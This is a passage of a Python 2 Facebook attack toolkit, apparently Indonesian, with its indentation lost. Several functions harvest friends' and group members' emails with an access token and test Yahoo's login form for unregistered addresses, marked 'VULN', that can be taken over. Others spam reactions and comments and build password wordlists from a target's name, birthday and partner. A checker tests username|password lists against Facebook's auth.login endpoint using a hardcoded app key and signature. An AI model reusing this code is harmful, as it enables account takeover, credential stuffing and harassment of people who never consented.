os.system('reset')
print logo
mpsh = []
jml = 0
jalan('\033[1;91m[✺] \033[1;92mGetting email friend \033[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/MailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/MailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### CLONE FROM FRIEND #####
def yahoofromfriends():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
jalan('\033[1;91m[✺] \033[1;92mGetting email from friend \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/FriendMailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/FriendMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### YAHOO MEMBER #####
def yahoomember():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
jalan('\033[1;91m[✺] \033[1;92mGetting email from group \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/GrupMailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/GrupMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### YAHOO FILE #####
def yahoolist():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
files = raw_input("\033[1;91m[+] \033[1;92mFile path \033[1;91m: \033[1;97m")
try:
total = open(files,"r")
mail = total.readlines()
except IOError:
print"\033[1;91m[!] File not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
mpsh = []
jml = 0
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
save = open('out/FileMailVuln.txt','w')
print 42*"\033[1;97m═"
mail = open(files,"r").readlines()
for pw in mail:
mail = pw.replace("\n","")
jml +=1
mpsh.append(jml)
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail)
berhasil.append(mail)
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/FileMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### MENU BOT #####
#----------------------------------------#
def menu_bot():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Bot Reactions Target Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Bot Reactions Grup Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Bot Komen Target Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m Bot Komen Grup Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Mass delete Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m6.\033[1;97m Mass accept friend"
print "\033[1;97m║--\033[1;91m> \033[1;92m7.\033[1;97m Mass delete friend"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
bot_pilih()
#////////////
def bot_pilih():
bots = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if bots =="":
print "\033[1;91m[!] Wrong input"
bot_pilih()
elif bots =="1":
menu_react()
elif bots =="2":
grup_react()
elif bots =="3":
bot_komen()
elif bots =="4":
grup_komen()
elif bots =="5":
deletepost()
elif bots =="6":
accept()
elif bots =="7":
unfriend()
elif bots =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
bot_pilih()
##### MENU REACT #####
def menu_react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print ("\033[1;97m║--\033[1;91m> \033[1;92m1. \033[1;97mLike")
print ("\033[1;97m║--\033[1;91m> \033[1;92m2. \033[1;97mLove")
print ("\033[1;97m║--\033[1;91m> \033[1;92m3. \033[1;97mWow")
print ("\033[1;97m║--\033[1;91m> \033[1;92m4. \033[1;97mHaha")
print ("\033[1;97m║--\033[1;91m> \033[1;92m5. \033[1;97mSadBoy")
print ("\033[1;97m║--\033[1;91m> \033[1;92m6. \033[1;97mAngry")
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
react_pilih()
#//////////////
def react_pilih():
global tipe
aksi = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if aksi =="":
print "\033[1;91m[!] Wrong input"
react_pilih()
elif aksi =="1":
tipe = "LIKE"
react()
elif aksi =="2":
tipe = "LOVE"
react()
elif aksi =="3":
tipe = "WOW"
react()
elif aksi =="4":
tipe = "HAHA"
react()
elif aksi =="5":
tipe = "SAD"
react()
elif aksi =="6":
tipe = "ANGRY"
react()
elif aksi =="0":
menu_bot()
else:
print "\033[1;91m[!] Wrong input"
react_pilih()
#####NEXT
def react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
ide = raw_input('\033[1;91m[+] \033[1;92mInput ID Target \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
try:
oh = requests.get("https://graph.facebook.com/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
ah = json.loads(oh.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post("https://graph.facebook.com/"+y+"/reactions?type="+tipe+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+y[:10].replace('\n',' ')+'... \033[1;92m] \033[1;97m'+tipe
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(reaksi))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT REACT GRUP #####
def grup_react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print ("\033[1;97m║--\033[1;91m> \033[1;92m1. \033[1;97mLike")
print ("\033[1;97m║--\033[1;91m> \033[1;92m2. \033[1;97mLove")
print ("\033[1;97m║--\033[1;91m> \033[1;92m3. \033[1;97mWow")
print ("\033[1;97m║--\033[1;91m> \033[1;92m4. \033[1;97mHaha")
print ("\033[1;97m║--\033[1;91m> \033[1;92m5. \033[1;97mSadBoy")
print ("\033[1;97m║--\033[1;91m> \033[1;92m6. \033[1;97mAngry")
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
reactg_pilih()
#//////////////
def reactg_pilih():
global tipe
aksi = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if aksi =="":
print "\033[1;91m[!] Wrong input"
reactg_pilih()
elif aksi =="1":
tipe = "LIKE"
reactg()
elif aksi =="2":
tipe = "LOVE"
reactg()
elif aksi =="3":
tipe = "WOW"
reactg()
elif aksi =="4":
tipe = "HAHA"
reactg()
elif aksi =="5":
tipe = "SAD"
reactg()
elif aksi =="6":
tipe = "ANGRY"
reactg()
elif aksi =="0":
menu_bot()
else:
print "\033[1;91m[!] Wrong input"
reactg_pilih()
#####NEXT
def reactg():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
ide = raw_input('\033[1;91m[+] \033[1;92mInput ID Group \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
try:
r=requests.get('https://graph.facebook.com/group/?id='+ide+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
grup_react()
try:
oh = requests.get("https://graph.facebook.com/v3.0/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
ah = json.loads(oh.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post("https://graph.facebook.com/"+y+"/reactions?type="+tipe+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+y[:10].replace('\n',' ')+'... \033[1;92m] \033[1;97m'+tipe
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(reaksigrup))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT KOMEN #####
def bot_komen():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[!] \033[1;92mUse \033[1;97m'<>' \033[1;92mfor new lines"
ide = raw_input('\033[1;91m[+] \033[1;92mID Target \033[1;91m:\033[1;97m ')
km = raw_input('\033[1;91m[+] \033[1;92mComment \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
km=km.replace('<>','\n')
try:
p = requests.get("https://graph.facebook.com/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
a = json.loads(p.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post("https://graph.facebook.com/"+f+"/comments?message="+km+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+km[:10].replace('\n',' ')+'... \033[1;92m]'
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(komen))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT KOMEN GRUP #####
def grup_komen():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[!] \033[1;92mUse \033[1;97m'<>' \033[1;92mfor new lines"
ide = raw_input('\033[1;91m[+] \033[1;92mID Group \033[1;91m:\033[1;97m ')
km = raw_input('\033[1;91m[+] \033[1;92mComment \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
km=km.replace('<>','\n')
try:
r=requests.get('https://graph.facebook.com/group/?id='+ide+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
try:
p = requests.get("https://graph.facebook.com/v3.0/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
a = json.loads(p.text)
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post("https://graph.facebook.com/"+f+"/comments?message="+km+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+km[:10].replace('\n',' ')+'... \033[1;92m]'
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(komengrup))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### HAPUS POST #####
def deletepost():
os.system('reset')
try:
toket=open('login.txt','r').read()
nam = requests.get('https://graph.facebook.com/me?access_token='+toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print("\033[1;91m[+] \033[1;92mFrom \033[1;91m: \033[1;97m%s"%nama)
jalan("\033[1;91m[+] \033[1;92mStart\033[1;97m ...")
print 42*"\033[1;97m═"
asu = requests.get('https://graph.facebook.com/me/feed?access_token='+toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/'+id+'?method=delete&access_token='+toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\033[1;91m[\033[1;97m'+id[:10].replace('\n',' ')+'...'+'\033[1;91m] \033[1;95mFailed'
except TypeError:
print '\033[1;92m[\033[1;97m'+id[:10].replace('\n',' ')+'...'+'\033[1;92m] \033[1;96mDeleted'
piro += 1
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] Connection Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### ACCEPT FRIEND #####
def accept():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
r = requests.get('https://graph.facebook.com/me/friendrequests?limit='+limit+'&access_token='+toket)
teman = json.loads(r.text)
if '[]' in str(teman['data']):
print"\033[1;91m[!] No friend request"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for i in teman['data']:
gas = requests.post('https://graph.facebook.com/me/friends/'+i['from']['id']+'?access_token='+toket)
a = json.loads(gas.text)
if 'error' in str(a):
print "\033[1;97m[ \033[1;91mFailed\033[1;97m ] "+i['from']['name']
else:
print "\033[1;97m[ \033[1;92mAccept\033[1;97m ] "+i['from']['name']
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### UNFRIEND ####
def unfriend():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print "\033[1;97mStop \033[1;91mCTRL+C"
print 42*"\033[1;97m═"
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete("https://graph.facebook.com/me/friends?uid="+id+"&access_token="+toket)
print "\033[1;97m[\033[1;92m Deleted \033[1;97m] "+nama
except IndexError: pass
except KeyboardInterrupt:
print "\033[1;91m[!] Stopped"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
print"\n\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
#### LAIN LAIN #####
# #
####MENU LAIN#####
def lain():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║--\033[1;91m> \033[1;92m1.\033[1;97m Create Post"
print "\033[1;97m║--\033[1;91m> \033[1;92m2.\033[1;97m Create Wordlist"
print "\033[1;97m║--\033[1;91m> \033[1;92m3.\033[1;97m Account Checker"
print "\033[1;97m║--\033[1;91m> \033[1;92m4.\033[1;97m See my group list"
print "\033[1;97m║--\033[1;91m> \033[1;92m5.\033[1;97m Profile Guard"
print "\033[1;97m║--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
pilih_lain()
#////////////
def pilih_lain():
other = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if other =="":
print "\033[1;91m[!] Wrong input"
pilih_lain()
elif other =="1":
status()
elif other =="2":
wordlist()
elif other =="3":
check_akun()
elif other =="4":
grupsaya()
elif other =="5":
guard()
elif other =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
pilih_lain()
##### STATUS #####
def status():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
msg=raw_input('\033[1;91m[+] \033[1;92mType status \033[1;91m:\033[1;97m ')
if msg == "":
print "\033[1;91m[!] Don't be empty"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
else:
res = requests.get("https://graph.facebook.com/me/feed?method=POST&message="+msg+"&access_token="+toket)
op = json.loads(res.text)
jalan('\033[1;91m[✺] \033[1;92mCreate \033[1;97m...')
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mStatus ID\033[1;91m : \033[1;97m"+op['id']
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
########### CREATE WORDLIST ##########
def wordlist():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
os.system('reset')
print logo
print "\033[1;91m[?] \033[1;92mFill in the complete data of the target below"
print 42*"\033[1;97m═"
a = raw_input("\033[1;91m[+] \033[1;92mNama Depan \033[1;97m: ")
file = open(a+".txt", 'w')
b=raw_input("\033[1;91m[+] \033[1;92mNama Tengah \033[1;97m: ")
c=raw_input("\033[1;91m[+] \033[1;92mNama Belakang \033[1;97m: ")
d=raw_input("\033[1;91m[+] \033[1;92mNama Panggilan \033[1;97m: ")
e=raw_input("\033[1;91m[+] \033[1;92mTanggal Lahir >\033[1;96mex: |DDMMYY| \033[1;97m: ")
f=e[0:2]
g=e[2:4]
h=e[4:]
print 42*"\033[1;97m═"
print("\033[1;91m[?] \033[1;93mKalo Jomblo SKIP aja :v")
i=raw_input("\033[1;91m[+] \033[1;92mNama Pacar \033[1;97m: ")
j=raw_input("\033[1;91m[+] \033[1;92mNama Panggilan Pacar \033[1;97m: ")
k=raw_input("\033[1;91m[+] \033[1;92mTanggal Lahir Pacar >\033[1;96mex: |DDMMYY| \033[1;97m: ")
jalan('\033[1;91m[✺] \033[1;92mCreate \033[1;97m...')
l=k[0:2]
m=k[2:4]
n=k[4:]
file.write("%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s" % (a,c,a,b,b,a,b,c,c,a,c,b,a,a,b,b,c,c,a,d,b,d,c,d,d,d,d,a,d,b,d,c,a,e,a,f,a,g,a,h,b,e,b,f,b,g,b,h,c,e,c,f,c,g,c,h,d,e,d,f,d,g,d,h,e,a,f,a,g,a,h,a,e,b,f,b,g,b,h,b,e,c,f,c,g,c,h,c,e,d,f,d,g,d,h,d,d,d,a,f,g,a,g,h,f,g,f,h,f,f,g,f,g,h,g,g,h,f,h,g,h,h,h,g,f,a,g,h,b,f,g,b,g,h,c,f,g,c,g,h,d,f,g,d,g,h,a,i,a,j,a,k,i,e,i,j,i,k,b,i,b,j,b,k,c,i,c,j,c,k,e,k,j,a,j,b,j,c,j,d,j,j,k,a,k,b,k,c,k,d,k,k,i,l,i,m,i,n,j,l,j,m,j,n,j,k))
wg = 0
while (wg < 100):
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while (en < 100):
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while (word < 100):
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while (gen < 100):
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print 42*"\033[1;97m═"
print ("\033[1;91m[+] \033[1;92mSaved \033[1;91m: \033[1;97m %s.txt" %a)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except IOError, e:
print("\033[1;91m[!] Failed")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### CHECKER #####
def check_akun():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;91m[?] \033[1;92mCreate in file\033[1;91m : \033[1;97musername|password"
print 42*"\033[1;97m═"
live = []
cek = []
die = []
try:
file = raw_input("\033[1;91m[+] \033[1;92mFile path \033[1;91m:\033[1;97m ")
list = open(file,'r').readlines()
except IOError:
print ("\033[1;91m[!] File not found")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
pemisah = raw_input("\033[1;91m[+] \033[1;92mSeparator \033[1;91m:\033[1;97m ")
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for meki in list:
username, password = (meki.strip()).split(str(pemisah))
url = "https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(username)+"&locale=en_US&password="+(password)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6"
data = requests.get(url)
mpsh = json.loads(data.text)
if 'access_token' in mpsh:
live.append(password)
print"\033[1;97m[ \033[1;92mLive\033[1;97m ] \033[1;97m"+username+"|"+password
elif 'www.facebook.com' in mpsh["error_msg"]:
cek.append(password)
print"\033[1;97m[ \033[1;93mCheck\033[1;97m ] \033[1;97m"+username+"|"+password
else:
die.append(password)
print"\033[1;97m[ \033[1;91mDie\033[1;97m ] \033[1;97m"+username+"|"+password
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mTotal\033[1;91m : \033[1;97mLive=\033[1;92m"+str(len(live))+" \033[1;97mCheck=\033[1;93m"+str(len(cek))+" \033[1;97mDie=\033[1;91m"+str(len(die))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### GRUP SAYA #####
def grupsaya():
os.system('reset')
try:
